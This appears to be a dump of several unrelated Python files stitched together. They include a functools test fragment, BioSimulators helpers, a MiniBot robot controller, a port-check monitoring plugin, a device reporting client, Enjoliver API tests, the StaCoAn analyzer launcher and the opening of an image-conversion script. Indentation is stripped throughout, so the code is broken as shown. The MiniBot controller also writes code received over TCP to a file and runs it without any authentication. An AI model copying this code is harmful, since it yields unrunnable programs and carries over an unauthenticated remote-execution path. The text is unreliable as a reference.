with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
if __name__ == '__main__':
unittest.main()
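# A minimal way to run a single test class from this suite (assuming the module
# is importable as test_functools; adjust the name to match the actual file):
#   python -m unittest test_functools.TestTotalOrdering -v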
|
utils.py
|
from biosimulators_utils.log.data_model import CombineArchiveLog # noqa: F401
from biosimulators_utils.report.data_model import SedDocumentResults # noqa: F401
import functools
import importlib
import multiprocessing
import os
import sys
import time
import types # noqa: F401
import yaml
__all__ = [
'get_simulators',
'get_simulator_api',
'get_simulator_metadata',
'use_simulator_api_to_exec_sedml_docs_in_combine_archive',
'exec_in_subprocess',
]
@functools.lru_cache(maxsize=None)
def get_simulators():
""" Get the ids and APIs of the available simulation tools
Returns:
:obj:`list` of :obj:`dict`: list of the id and name of the module which implements the API for
each available simulation tool
"""
with open(os.path.join(os.path.dirname(__file__), 'simulators.yml'), 'r') as file:
return yaml.load(file, Loader=yaml.Loader)
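# Sketch of the expected 'simulators.yml' layout, inferred from how
# get_simulator_metadata() reads each entry below; the id, name, module, and
# package values are illustrative assumptions, not real entries:
#
# - id: tellurium
#   name: tellurium
#   api:
#     module: biosimulators_tellurium
#     package: biosimulators-tellurium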
def get_simulator_api(api, reload=False):
""" Get the BioSimulators API for a simulator
Args:
api (:obj:`str`): module which implements the API for the simulator
reload (:obj:`bool`, optional): whether to reload the API
Returns:
:obj:`types.ModuleType`
"""
module = importlib.import_module(api)
if reload:
importlib.reload(module)
return module
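# Hypothetical usage (the module name is illustrative):
#   api = get_simulator_api('biosimulators_tellurium')
#   api = get_simulator_api('biosimulators_tellurium', reload=True)  # force a re-import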
def get_simulator_metadata(id):
""" Get metadata about a simulator
Args:
id (:obj:`str`): BioSimulators id of the simulator
Returns:
:obj:`dict`: metadata about the simulator
"""
simulator = next(simulator for simulator in get_simulators() if simulator['id'] == id)
id = simulator['id']
name = simulator['name']
api_module = simulator['api']['module']
api = get_simulator_api(api_module)
version = api.get_simulator_version()
api_version = api.__version__
return {
'_type': 'Simulator',
'id': id,
'name': name,
'version': version,
'api': {
'_type': 'SimulatorApi',
'module': api_module,
'package': simulator['api']['package'],
'version': api_version,
},
'specs': 'https://api.biosimulators.org/simulators/{}/{}'.format(id, version),
}
def use_simulator_api_to_exec_sedml_docs_in_combine_archive(api_name, *args, **kwargs):
""" Execute the SED-ML tasks defined in a COMBINE/OMEX archive and save the outputs
Args:
api_name (:obj:`str`): module which implements the API for the simulator
*args (:obj:`list`): positional arguments to ``exec_sedml_docs_in_combine_archive``
**kwargs (:obj:`dict`): keyword arguments to ``exec_sedml_docs_in_combine_archive``
Returns:
:obj:`tuple`:
* :obj:`SedDocumentResults`: results
* :obj:`dict` in the ``SimulationRunResults`` schema: log
"""
api = get_simulator_api(api_name)
results, log = api.exec_sedml_docs_in_combine_archive(*args, **kwargs)
if log:
log = log.to_json()
return results, log
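# Hypothetical call (the API module name, archive path, and output directory are
# illustrative; the positional arguments are assumed to be the archive filename
# and an output directory expected by ``exec_sedml_docs_in_combine_archive``):
#   results, log = use_simulator_api_to_exec_sedml_docs_in_combine_archive(
#       'biosimulators_tellurium', './archive.omex', './out')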
class Process(multiprocessing.context.ForkProcess):
""" Fork process which collects the exceptions of its child
Attributes:
_parent_conn (:obj:`multiprocessing.connection.Connection`): connection for the parent
_child_conn (:obj:`multiprocessing.connection.Connection`): connection for the child
_exception (:obj:`Exception` or :obj:`None`): exception, if any, from the process' child
Inspired by https://stackoverflow.com/questions/19924104/
"""
def __init__(self, *args, **kwargs):
super(multiprocessing.context.ForkProcess, self).__init__(*args, **kwargs)
self._parent_conn, self._child_conn = multiprocessing.Pipe()
self._exception = None
def run(self):
""" Run the process """
try:
super(multiprocessing.context.ForkProcess, self).run()
self._child_conn.send(False)
except Exception as exception:
self._child_conn.send(exception.with_traceback(sys.exc_info()[2]))
@property
def exception(self):
""" Get the exception from process' child, if any
Returns:
:obj:`Exception` or :obj:`None`: exception, if any, from the process' child
"""
if self._parent_conn.poll():
self._exception = self._parent_conn.recv()
return self._exception
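# Minimal illustration of how child exceptions surface through this class (a
# sketch only; exec_in_subprocess() below is the real consumer of the pattern,
# and 'some_callable' is a hypothetical target):
#   proc = Process(target=some_callable)
#   proc.start()
#   proc.join()
#   if proc.exception:
#       raise proc.exception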
def exec_in_subprocess(func, *args, poll_interval=0.01, timeout=None, **kwargs):
""" Execute a function in a fork
Args:
func (:obj:`types.FunctionType`): function
*args (:obj:`list`): list of positional arguments for the function
poll_interval (:obj:`float`, optional): interval to poll the status of the subprocess
timeout (:obj:`float`, optional): maximum execution time in seconds
**kwargs (:obj:`dict`, optional): dictionary of keyword arguments for the function
Returns:
:obj:`object`: result of the function
"""
context_instance = multiprocessing.get_context('fork')
queue = context_instance.Queue()
process = Process(target=subprocess_target, args=[queue, func] + list(args), kwargs=kwargs)
process.start()
start_time = time.time()
while process.exception is None:
time.sleep(poll_interval)
if timeout is not None and (time.time() - start_time) > timeout:
raise TimeoutError('Execution did not complete in {} s.'.format(timeout))
if process.exception:
raise process.exception
results = queue.get()
return results
def subprocess_target(queue, func, *args, **kwargs):
""" Target executer for a subprocess
Args:
queue (:obj:`multiprocessing.queues.Queue`): queue to send the results of the function to
func (:obj:`types.FunctionType`): function to execute
args (:obj:`list`): list of positional arguments for the function
kwargs (:obj:`dict`): dictionary of keyword arguments for the function
"""
result = func(*args, **kwargs)
queue.put(result)
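# --- Minimal usage sketch of exec_in_subprocess (not part of the original
# module; assumes a POSIX platform where the 'fork' start method exists) ---
def _demo_add(x, y):
    """Toy function used only to illustrate exec_in_subprocess."""
    return x + y


if __name__ == '__main__':
    # Runs _demo_add(1, 2) in a forked child; raises TimeoutError if it takes
    # longer than 5 seconds.
    print(exec_in_subprocess(_demo_add, 1, 2, timeout=5.))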
|
main.py
|
import json, time, multiprocessing, importlib, sys
import MiniBotFramework
from threading import Thread
from multiprocessing import Process
from multiprocessing.managers import BaseManager
from queue import Queue  # Python 3 module name; it was "Queue" in Python 2
# Constants
CONFIG_LOCATION = "MiniBotConfig/config.json"
def main():
#BaseManager.register('MiniBot',MiniBotFramework.MiniBot.MiniBot)
#manager = BaseManager()
#manager.start()
#p = multiprocessing.Process(target=time.sleep, args=(1000,))
p = None
print("Initializing MiniBot Software")
# Load config
with open(CONFIG_LOCATION) as config_file:
    config = json.loads(config_file.read())
bot = MiniBotFramework.MiniBot.MiniBot(config)
# Initialize TCP
tcpInstance = None
if config["acceptTcp"]:
tcpInstance = MiniBotFramework.Communication.TCP.TCP()
# Initialize UDP broadcast
if config["discoverable"]:
thread_udp = Thread(target = MiniBotFramework.Communication.UDP.udpBeacon)
thread_udp.start()
# If startup script specified, run it
if config["startupScript"] != "":
# TODO Allow uploading startup scripts!
pass
accept_xbox = False
if config["acceptXbox"]:
accept_xbox = True
xboxInstance = MiniBotFramework.Controls.Xbox.Xbox()
print("Entering main loop")
# Main loop
while True:
# Poll TCP Connection
tcpCmd = tcpInstance.get_command()
if tcpCmd != "":
x = parse_command(tcpCmd, bot, p)
if x is not None:
p = x
# Poll Xbox
if accept_xbox and MiniBotFramework.Controls.Xbox.Xbox.updated:
MiniBotFramework.Controls.Xbox.Xbox.updated = False
x_left = MiniBotFramework.Controls.Xbox.Xbox.left
x_right = MiniBotFramework.Controls.Xbox.Xbox.right
bot.get_actuator_by_name("two_wheel_movement").move(x_left,x_right)
# Check on the main code
time.sleep(0.001)
def parse_command(cmd, bot, p):
comma = cmd.find(",")
start = cmd.find("<<<<")
end = cmd.find(">>>>")
key = cmd[start+4:comma]
value = cmd[comma+1:end]
if key == "WHEELS":
try:
values = value.split(",")
bot.get_actuator_by_name("two_wheel_movement").move(int(float(values[0])),int(float(values[1])))
except Exception as e:
print(e)
print("oh no!")
pass
elif key == "SCRIPT":
user_script_file = open("MiniBotScripts/UserScript.py",'w')
user_script_file.write(value)
user_script_file.close()
p = spawn_script_process(p, bot)
return p
elif key == "RUN":
p = spawn_named_script_process(p, bot, value)
return p
else:
bot.extraCMD.put( (key, value) )
print("Unknown key: " + key)
print("Cmd: " + cmd)
return None
def spawn_script_process(p,bot):
if (p is not None and p.is_alive()):
p.terminate()
time.sleep(0.1)
p = Thread(target=run_script, args=[bot])
p.start()
# Return control to main after .1 seconds
return p
def spawn_named_script_process(p,bot,name):
if (p is not None and p.is_alive()):
p.terminate()
time.sleep(0.1)
p = Thread(target=run_script_with_name, args=[bot,name])
p.start()
# Return control to main after .1 seconds
return p
def run_script_with_name(bot,script_name):
sys.path.insert(0, './lib')
UserScript = importlib.import_module("MiniBotScripts." + script_name)
UserScript.run(bot)
def run_script(bot):
from MiniBotScripts import UserScript
UserScript.run(bot)
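# Illustrative sketch (not part of the original): a script launched via the
# SCRIPT/RUN commands lives in MiniBotScripts/ and is expected to expose a
# run(bot) entry point, along the lines of:
#
#   def run(bot):
#       bot.get_actuator_by_name("two_wheel_movement").move(50, 50)
#
# (the actuator name and move() call mirror the ones used in the main loop;
# the power values are hypothetical)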
if (__name__ == "__main__"):
main()
|
init.py
|
#!/usr/bin/env python
# Copyright 2014 Boundary, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import json
from threading import Thread, Lock
from port_scanner import PortScanner
class PortScanPlugin:
def __init__(self):
self.host = None
self.port = None
self.pollInterval = None
self.source = socket.gethostname()
self.result = None
self.response = None
self.config = None
def parse_configuration(self):
with open('param.json') as f:
self.config = json.load(f)
def execute(self):
self.parse_configuration()
self.run()
def run(self):
stdoutmutex = Lock() # same as thread.allocate_lock()
threads = []
config_items = self.config['items']
print(len(config_items))
for item in config_items:
host = item['host']
port = item['port']
source = item['source']
if len(source) == 0:
source = host
interval = item['pollInterval']
print(host)
p = PortScanner(host=host,
port=port,
source=source,
interval=interval,
mutex=stdoutmutex)
            thread = Thread(target=p.scan_port)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join() # wait for thread exits
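# Illustrative sketch (not part of the original): run() above expects param.json
# to provide an "items" list whose entries carry the keys read in the loop
# (host, port, source, pollInterval). The concrete values below are hypothetical:
#
#   {
#     "items": [
#       {"host": "example.com", "port": 443, "source": "", "pollInterval": 60}
#     ]
#   }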
if __name__ == "__main__":
p = PortScanPlugin()
p.execute()
|
divae.py
|
import configparser
import socket
import threading
import signal
import os
import sys
import traceback
import base64
import select
import json
from threading import Timer
sys.path.append( "lib" )
from iseclogger import Logger
from commandprocessor import CommandProcessor
from threading import Thread
from configuration import LocalConfiguration
from peripheralscontrol import PeripheralController
import pdb
import urllib.request
#pdb.set_trace()
mainApp = None
class ReporterTimer():
def __init__(self, delay):
self.awesum="hh"
self.timer = Timer(delay,self.say_hello,args=["WOW"])
def say_hello(self,message):
        self.awesum = message
#REPORTING_INTERVAL = 15
class DiversityMain:
port = None
name = None
logger = None
main_thread = None
listenerSocket = None
senderSocket = None
localConfig = None;
periphController = None
commandProcessor = None
def __init__(self, localConfig, logger):
self.localConfig = localConfig
self.logger = logger
self.periphController = PeripheralController()
self.commandProcessor = CommandProcessor(logger,self.periphController, self.localConfig)
def start(self):
self.event = threading.Event();
self.main_thread = Thread(target = self.startMainThread, args = ("test", ))
self.main_thread.start()
self.periphController.startThread()
    def startMainThread(self, test):
self.startReportingTimer()
self.event.wait();
self.logger.write("reporttimer","out");
def startReportingTimer(self):
if(self.event.isSet()):
self.logger.write("reporttimer","Not restarting")
else:
self.timer = Timer(1,self.doReport,args=["WOW"])
self.timer.start()
freqcounter = 0;
reportAtStartup = True;
def doReport(self, message):
global localConfig;
freq = int(localConfig.connectfreq)
#self.logger.write("main_thread","reporting")
self.freqcounter += 1;
if(self.freqcounter >= freq or self.commandProcessor.wantPostNow() == True or self.reportAtStartup == True):
self.reportAtStartup = False;
self.freqcounter = 0;
self.postalive()
self.startReportingTimer()
def join(self):
self.main_thread.join();
def stop(self):
self.periphController.stopThread();
self.timer.cancel();
self.event.set();
def postalive(self):
postdata = {'cid': localConfig.clientid, 'psw' : localConfig.password }
self.commandProcessor.postAlive()
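# Illustrative note (not part of the original): DiversityMain re-arms a
# one-second threading.Timer on every tick and only posts when freqcounter
# reaches connectfreq, when the command processor asks for an immediate post,
# or on the first tick after startup. The same pattern in isolation looks like:
#
#   from threading import Timer
#   def tick():
#       maybe_do_work()          # hypothetical periodic work
#       Timer(1, tick).start()   # re-arm until stop() cancels the timer
#   Timer(1, tick).start()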
def signal_handler(signal, frame):
print('You pressed Ctrl+C!')
mainApp.stop();
log = Logger("logs/mainlog","txt", True)
log.write("main", "Starting")
localConfig = LocalConfiguration(log)
localConfig.load()
log.write("main", "Starting main thread")
mainApp = DiversityMain(localConfig, log)
mainApp.start()
signal.signal(signal.SIGINT, signal_handler)
print('Press Ctrl+C')
signal.pause()
log.write("main", "joining")
mainApp.join()
log.write("main", "completed")
|
test_api_simple.py
|
import json
import os
import shutil
import sys
import time
import unittest
from multiprocessing import Process
import requests
from app import api
from app import configs
from app import generator
from common import posts
ec = configs.EnjoliverConfig(importer=__file__)
class TestAPI(unittest.TestCase):
p_matchbox = Process
int_path = "%s" % os.path.dirname(__file__)
dbs_path = "%s/dbs" % int_path
tests_path = "%s" % os.path.dirname(int_path)
app_path = os.path.dirname(tests_path)
project_path = os.path.dirname(app_path)
matchbox_path = "%s/matchbox" % project_path
assets_path = "%s/matchbox/assets" % project_path
test_matchbox_path = "%s/test_matchbox" % tests_path
@staticmethod
def process_target_matchbox():
os.environ["ENJOLIVER_MATCHBOX_PATH"] = TestAPI.test_matchbox_path
os.environ["ENJOLIVER_MATCHBOX_ASSETS"] = TestAPI.assets_path
cmd = [
"%s" % sys.executable,
"%s/manage.py" % TestAPI.project_path,
"matchbox",
]
print("PID -> %s\n"
"exec -> %s\n" % (
os.getpid(), " ".join(cmd)))
sys.stdout.flush()
os.execve(cmd[0], cmd, os.environ)
@classmethod
def setUpClass(cls):
time.sleep(0.1)
try:
os.remove(ec.db_path)
except OSError:
pass
smart = api.SmartDatabaseClient(ec.db_uri)
smart.create_base()
api.SMART = smart
api.repositories = api.RepositoriesRegister(smart)
api.CACHE.clear()
shutil.rmtree(ec.ignition_journal_dir, ignore_errors=True)
cls.app = api.app.test_client()
cls.app.testing = True
cls.p_matchbox = Process(target=TestAPI.process_target_matchbox)
print("PPID -> %s\n" % os.getpid())
cls.p_matchbox.start()
assert cls.p_matchbox.is_alive() is True
cls.matchbox_running(ec.matchbox_uri, cls.p_matchbox)
@classmethod
def tearDownClass(cls):
print("TERM -> %d\n" % cls.p_matchbox.pid)
sys.stdout.flush()
cls.p_matchbox.terminate()
cls.p_matchbox.join(timeout=5)
time.sleep(0.2)
@staticmethod
def matchbox_running(matchbox_endpoint, p_matchbox):
response_body = ""
response_code = 404
for i in range(10):
assert p_matchbox.is_alive() is True
try:
request = requests.get(matchbox_endpoint)
response_body = request.content
response_code = request.status_code
request.close()
break
except requests.exceptions.ConnectionError:
pass
time.sleep(0.2)
assert b"matchbox\n" == response_body
assert 200 == response_code
@staticmethod
def clean_sandbox():
dirs = ["%s/%s" % (
TestAPI.test_matchbox_path, k) for k in (
"profiles", "groups")]
for d in dirs:
for f in os.listdir(d):
if ".json" in f:
os.remove("%s/%s" % (d, f))
def setUp(self):
self.assertTrue(self.p_matchbox.is_alive())
self.clean_sandbox()
api.CACHE.clear()
def test_00_healthz(self):
expect = {
u'flask': True,
u'global': False,
u'db': True,
'discovery': {'ignition': False, 'ipxe': False},
u'matchbox': {
u'/': True,
u'/boot.ipxe': True,
u'/boot.ipxe.0': True,
u'/assets': True,
u"/metadata": True
}}
result = self.app.get('/healthz')
content = json.loads(result.data.decode())
self.assertEqual(expect, content)
self.assertEqual(result.status_code, 503)
def test_01_boot_ipxe(self):
expect = [
"#!ipxe",
"echo start /boot.ipxe",
":retry_dhcp",
"dhcp || goto retry_dhcp",
]
result = self.app.get('/boot.ipxe')
self.assertEqual(200, result.status_code)
self.assertEqual(expect, result.data.decode().split('\n')[:4])
def test_01_boot_ipxe_0(self):
expect = [
"#!ipxe",
"echo start /boot.ipxe",
":retry_dhcp",
"dhcp || goto retry_dhcp",
]
result = self.app.get('/boot.ipxe.0')
self.assertEqual(200, result.status_code)
self.assertEqual(expect, result.data.decode().split('\n')[:4])
def test_02_root(self):
result = self.app.get('/')
self.assertEqual(result.status_code, 200)
def test_03_ipxe_404(self):
self.app.get('/ipxe')
def test_04_ipxe(self):
marker = "%s-%s" % (TestAPI.__name__.lower(), self.test_04_ipxe.__name__)
ignition_file = "inte-%s.yaml" % marker
gen = generator.Generator(
api_uri=ec.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
matchbox_path=self.test_matchbox_path)
gen.dumps()
result = self.app.get('/ipxe')
expect = "#!ipxe\n" \
"kernel " \
"%s/assets/coreos/serve/coreos_production_pxe.vmlinuz " \
"console=ttyS0 console=ttyS1 " \
"coreos.config.url=%s/ignition?uuid=${uuid}&mac=${net0/mac:hexhyp} " \
"coreos.first_boot " \
"coreos.oem.id=pxe\n" \
"initrd %s/assets/coreos/serve/coreos_production_pxe_image.cpio.gz \n" \
"boot\n" % (gen.profile.api_uri, gen.profile.api_uri, gen.profile.api_uri)
expect = str.encode(expect)
self.assertEqual(expect, result.data)
self.assertEqual(200, result.status_code)
def test_05_ipxe_selector(self):
mac = "00:00:00:00:00:00"
marker = "%s-%s" % (TestAPI.__name__.lower(), self.test_05_ipxe_selector.__name__)
ignition_file = "inte-%s.yaml" % marker
gen = generator.Generator(
api_uri=ec.api_uri,
profile_id="id-%s" % marker,
name="name-%s" % marker,
ignition_id=ignition_file,
selector={"mac": mac},
matchbox_path=self.test_matchbox_path
)
gen.dumps()
result = self.app.get('/ipxe?mac=%s' % mac)
expect = "#!ipxe\n" \
"kernel %s/assets/coreos/serve/coreos_production_pxe.vmlinuz " \
"console=ttyS0 console=ttyS1 coreos.config.url=%s/ignition?uuid=${uuid}&mac=${net0/mac:hexhyp} " \
"coreos.first_boot coreos.oem.id=pxe\n" \
"initrd %s/assets/coreos/serve/coreos_production_pxe_image.cpio.gz \n" \
"boot\n" % (gen.profile.api_uri, gen.profile.api_uri, gen.profile.api_uri)
expect = str.encode(expect)
self.assertEqual(expect, result.data)
self.assertEqual(200, result.status_code)
def test_06_discovery_400(self):
result = self.app.post('/discovery', data="ok")
self.assertEqual(result.status_code, 406)
def test_06_discovery_00(self):
result = self.app.post('/discovery', data=json.dumps(posts.M01),
content_type='application/json')
self.assertEqual(json.loads(result.data.decode()), {'new-discovery': True})
self.assertEqual(result.status_code, 200)
def test_06_discovery_01(self):
result = self.app.post('/discovery', data=json.dumps(posts.M02),
content_type='application/json')
self.assertEqual(json.loads(result.data.decode()), {'new-discovery': True})
self.assertEqual(result.status_code, 200)
result = self.app.post('/discovery', data=json.dumps(posts.M02),
content_type='application/json')
self.assertEqual(json.loads(result.data.decode()), {'new-discovery': False})
self.assertEqual(result.status_code, 200)
result = self.app.get("/discovery")
result_data = json.loads(result.data.decode())
self.assertEqual(2, len(result_data))
def test_07_404_fake(self):
result = self.app.get('/fake')
self.assertEqual(result.status_code, 404)
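# Illustrative note (not part of the original): setUpClass spawns matchbox in a
# child Process whose target replaces itself with "manage.py matchbox" via
# os.execve, and matchbox_running() then polls the HTTP endpoint with short
# sleeps until it answers "matchbox\n" or the retries run out. The same
# wait-for-server pattern in isolation ("endpoint" is a placeholder):
#
#   for _ in range(10):
#       try:
#           if requests.get(endpoint).status_code == 200:
#               break
#       except requests.exceptions.ConnectionError:
#           time.sleep(0.2)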
|
stacoan.py
|
#!/bin/python
import codecs
import hashlib
import os
import sys
import webbrowser
import configparser
import argparse
import threading
import json
import multiprocessing
from threading import Thread
from multiprocessing import Process
from time import time
from helpers.logger import Logger
from helpers.project import Project
from helpers.report_html import Report_html
from helpers.searchwords import Searchwords
from helpers.server import ServerWrapper
def parse_args():
# Description
argument_width_in_help = 30
parser = argparse.ArgumentParser(description='StaCoAn is a crossplatform tool '
'which aids developers, bugbounty hunters and ethical hackers performing static '
'code analysis on mobile applications.',
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=argument_width_in_help))
# Arguments: see https://docs.python.org/3/library/argparse.html
parser.add_argument('-p', metavar="PATH", dest='project', required=False, nargs='+',
help='Relative path to the project')
parser.add_argument('--disable-browser', action='store_true', required=False,
help='Do not automatically open the HTML report in a browser')
parser.add_argument('--enable-server', action='store_true', required=False,
                        help='Run the server to drag and drop files to be analysed')
log_group = parser.add_mutually_exclusive_group(required=False)
log_group.add_argument('--log-all', action='store_true', help='Log all errors, warnings and info messages (default)')
log_group.add_argument('--log-errors', action='store_true', help='Log only errors')
log_group.add_argument('--log-warnings', action='store_true', help='Log only errors and warning messages')
    # return our args; usage: args.argname
return parser.parse_args()
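# Illustrative invocations (not part of the original; file names are hypothetical):
#   python stacoan.py -p app.apk                                 # analyse one project
#   python stacoan.py -p app.apk --disable-browser --log-errors
#   python stacoan.py --enable-server                            # drag-and-drop server mode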
# Note that this server(args) function CANNOT be placed in the server.py file. It calls "program()", which cannot be
# called from the server.py file
def server(args, server_enabled, DRAG_DROP_SERVER_PORT):
    # Multiprocessing differs between Linux and Windows (fork vs. a fresh instance without the parent's context and args)
child=False
if os.name == 'nt':
if os.path.exists(".temp_thread_file"):
with open(".temp_thread_file") as f:
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
args.project = [content[0]]
args.enable_server = content[1]
args.log_warnings = content[2]
args.disable_browser = content[3]
child = True
os.remove(".temp_thread_file")
if (server_enabled or args.enable_server or ((not len(sys.argv) > 1))) and (not child):
# This is a "bridge" between the stacoan program and the server. It communicates via this pipe (queue)
def serverlistener(in_q):
while True:
# Get some data
data = in_q.get()
if data == "KILLSERVERCOMMAND":
t1.isAlive = False
download_thread.isAlive = False
Logger("Server reports killed", Logger.INFO)
Logger("Exiting program! Bye. ", Logger.INFO)
exit(0)
# Process the data
args = argparse.Namespace(project=[data], enable_server=False, log_warnings=False, log_errors=False, disable_browser=True)
# On windows: write arguments to file, spawn process, read arguments from file, delete.
if os.name == 'nt':
with open('.temp_thread_file', 'a') as the_file:
the_file.write(data+"\n")
the_file.write("False\n") # enable_server
the_file.write("False\n") # log_warnings
the_file.write("True\n")
p = Process(target=program, args=(args,))
p.start()
# Create report server instance
reportserver = ServerWrapper.create_reportserver()
download_thread = threading.Thread(target=reportserver.serve_forever)
download_thread.daemon = True
download_thread.start()
# Create the shared queue and launch both threads
t1 = Thread(target=serverlistener, args=(ServerWrapper.dragdropserver.q,))
t1.daemon = True
t1.start()
dragdropserver = ServerWrapper.create_drag_drop_server()
drag_drop_server_thread = threading.Thread(target=dragdropserver.serve_forever)
drag_drop_server_thread.daemon = True
drag_drop_server_thread.start()
if not args.disable_browser:
# Open the webbrowser to the generated start page.
report_folder_start = "http:///127.0.0.1:" + str(DRAG_DROP_SERVER_PORT)
if sys.platform == "darwin": # check if on OSX
# strip off http:///
report_folder_start = str(report_folder_start).strip("http:///")
report_folder_start = "file:///" + report_folder_start
webbrowser.open(report_folder_start)
# Keep waiting until q is gone.
ServerWrapper.dragdropserver.q.join()
drag_drop_server_thread.join()
return() # Not needed because it will be killed eventually.
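# Illustrative data flow for server() above (not part of the original):
#   drag-and-drop upload -> dragdropserver puts the file path on ServerWrapper.dragdropserver.q
#   serverlistener       -> pops the path, builds an argparse.Namespace and runs program() in a new Process
#   "KILLSERVERCOMMAND"  -> shuts the listener (and with it the report server) down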
def program(args):
# Script cannot be called outside script directory. It contains a lot of os.getcwd().
if not os.path.dirname(os.path.abspath(__file__)) == os.getcwd():
Logger("Script cannot be called outside directory", Logger.ERROR)
# Keep track of execution time
start_time = time()
# Read information from config file
# Todo edit dockerfile with new path for report
# ToDo create a settings class that parses the ini file with set and get functions
config = configparser.ConfigParser()
config.read("config.ini")
server_enabled = config.getboolean("ProgramConfig", 'server_enabled')
DRAG_DROP_SERVER_PORT = json.loads(config.get("Server", 'drag_drop_server_port'))
# Update log level
if not (args.log_warnings or args.log_errors):
loglevel = 3
else:
loglevel = 1 if args.log_errors else 2
config.set('ProgramConfig', 'loglevel', str(loglevel))
with open("config.ini", "w+") as configfile:
config.write(configfile)
# Import the searchwords lists
Searchwords.searchwords_import(Searchwords())
# Server(args) checks if the server should be run and handles the spawning of the server and control of it
server(args, server_enabled, DRAG_DROP_SERVER_PORT)
# For each project (read .ipa or .apk file), run the scripts.
all_project_paths = args.project
if not all_project_paths:
sys.exit(0)
for project_path in all_project_paths:
try:
Project.projects[project_path] = Project(project_path)
except:
sys.exit(0)
report_folder = os.path.join(Project.projects[project_path].name, config.get("ProgramConfig", 'report_folder'))
report_folder_start = os.path.join(os.getcwd(), report_folder, "start.html")
Logger("Decompiling app...")
Project.projects[project_path].app_prepper()
Logger("Decompiling done.")
Logger("Searching trough files")
Project.projects[project_path].searchcontroller()
Logger("Searching done.")
Logger("start generating report")
# ToDo: Generate the tree-view + Source code view for each SOURCE file
all_files = dict()
all_files.update(Project.projects[project_path].db_files)
all_files.update(Project.projects[project_path].src_files)
amount_files = len(all_files)
for i, file in enumerate(all_files):
Logger("progress: "+str(format((i/amount_files)*100, '.2f'))+"%", rewriteLine=True)
hash_object = hashlib.md5(file.encode('utf-8'))
file_report_file = os.path.join(report_folder, hash_object.hexdigest()+'.html')
overview_html = Report_html(Project.projects[project_path])
overview_html.header("tree")
overview_html.navigation()
overview_html.tree_view(Project.projects[project_path], file)
overview_html.footer()
f = codecs.open(file_report_file, 'w', encoding='utf8')
f.write(overview_html.gethtml())
# with open(file_report_file, 'w') as f:
# print(overview_html.gethtml(), file=f)
Logger("progress: 100% ")
# Generate the startpage
file_report_file = os.path.join(report_folder, 'start.html')
overview_html = Report_html(Project.projects[project_path])
overview_html.header("tree")
overview_html.navigation()
overview_html.tree_view(Project.projects[project_path], "")
overview_html.footer()
f = codecs.open(file_report_file, 'w', encoding='utf8')
f.write(overview_html.gethtml())
# with open(file_report_file, 'w') as f:
# print(overview_html.gethtml(), file=f)
# Generate words overview html file
words_overview_html_report_file = os.path.join(report_folder, "wordlist_overview.html")
words_overview_html = Report_html(Project.projects[project_path])
words_overview_html.header("words_overview")
words_overview_html.navigation()
words_overview_html.html_wordlist(Project.projects[project_path])
words_overview_html.footer()
with open(words_overview_html_report_file, 'w') as f:
print(words_overview_html.gethtml(), file=f)
# Generate lootbox
lootbox_html_report_file = os.path.join(report_folder, "lootbox.html")
lootbox_html_report = Report_html(Project.projects[project_path])
lootbox_html_report.header("lootbox")
lootbox_html_report.navigation()
lootbox_html_report.lootbox()
lootbox_html_report.footer()
f = codecs.open(lootbox_html_report_file, 'w', encoding='utf8')
f.write(lootbox_html_report.gethtml())
# with open(lootbox_html_report_file, 'w') as f:
# print(lootbox_html_report.gethtml(), file=f)
# Generate the treeview
tree_js_file_path = os.path.join(report_folder, "tree_js_content.js")
f = codecs.open(tree_js_file_path, 'w', encoding='utf8')
f.write(Report_html.Tree_builder.tree_js_file(Project.projects[project_path]))
# with open(tree_js_file_path, 'w') as f:
# print(Report_html.Tree_builder.tree_js_file(Project.projects[project_path]), file=f)
# Generate looty.js file, for the zip creation process at the lootbox page
Report_html().make_loot_report_content()
# Write all log-events to logfile
Logger.dump()
# Log some end results
if loglevel == 3:
print("\n--------------------\n")
Logger("Static code analyzer completed succesfully in %fs." % (time() - start_time))
Logger("HTML report is available at: %s" % report_folder_start)
if (not args.disable_browser) and not (args.enable_server or server_enabled):
Logger("Now automatically opening the HTML report.")
# Open the webbrowser to the generated start page.
if sys.platform == "darwin": # check if on OSX
# strip off http:///
report_folder_start = str(report_folder_start).strip("http:///")
report_folder_start = "file:///" + report_folder_start
webbrowser.open(report_folder_start)
# Exit program
sys.exit()
if __name__ == "__main__":
multiprocessing.freeze_support()
if os.environ.get('DEBUG') is not None:
program(parse_args())
exit(0)
try:
program(parse_args())
except Exception as e:
Logger("ERROR: Unknown error: %s." % str(e), Logger.ERROR)
|
ImageConvertTool.py
|
"""
Helper script for using Basisu.
Usage:
$ basisu.py fixall
- TODO:
"""
import sys
import os
from shutil import copyfile
import subprocess
import threading
import time
import platform
# LIST OF COMMANDS
# -----------------------------
CMD_FIXALL = "fixall"
# -----------------------------
# HELPERS ----------------------------------------------------------------------------
def PrintHelp():
print(' ')
print('GLTF texture folder Helper for managing texture file names and folder structure.')
print(' ')
print('Usage:')
print(' basisu.py [command] [args]')
print(' ')
print('Available Commands:')
print(' ', CMD_FIXALL)
print(' ')
def CheckCommand(cmd):
if ( not cmd == CMD_FIXALL
):
return False
return True
# COMMANDS ---------------------------------------------------------------------------
def ExecCmdInit():
if len(sys.argv) < 3:
print('init: missing argument: please provide the folder name to initialize.')
return
folder_name = sys.argv[2]
# create the folder provided in the argument
try:
os.mkdir(folder_name)
except OSError:
print('Could not create directory: ', folder_name)
# change dir and create subfolders
os.chdir(folder_name)
try:
os.mkdir("2K")
except OSError:
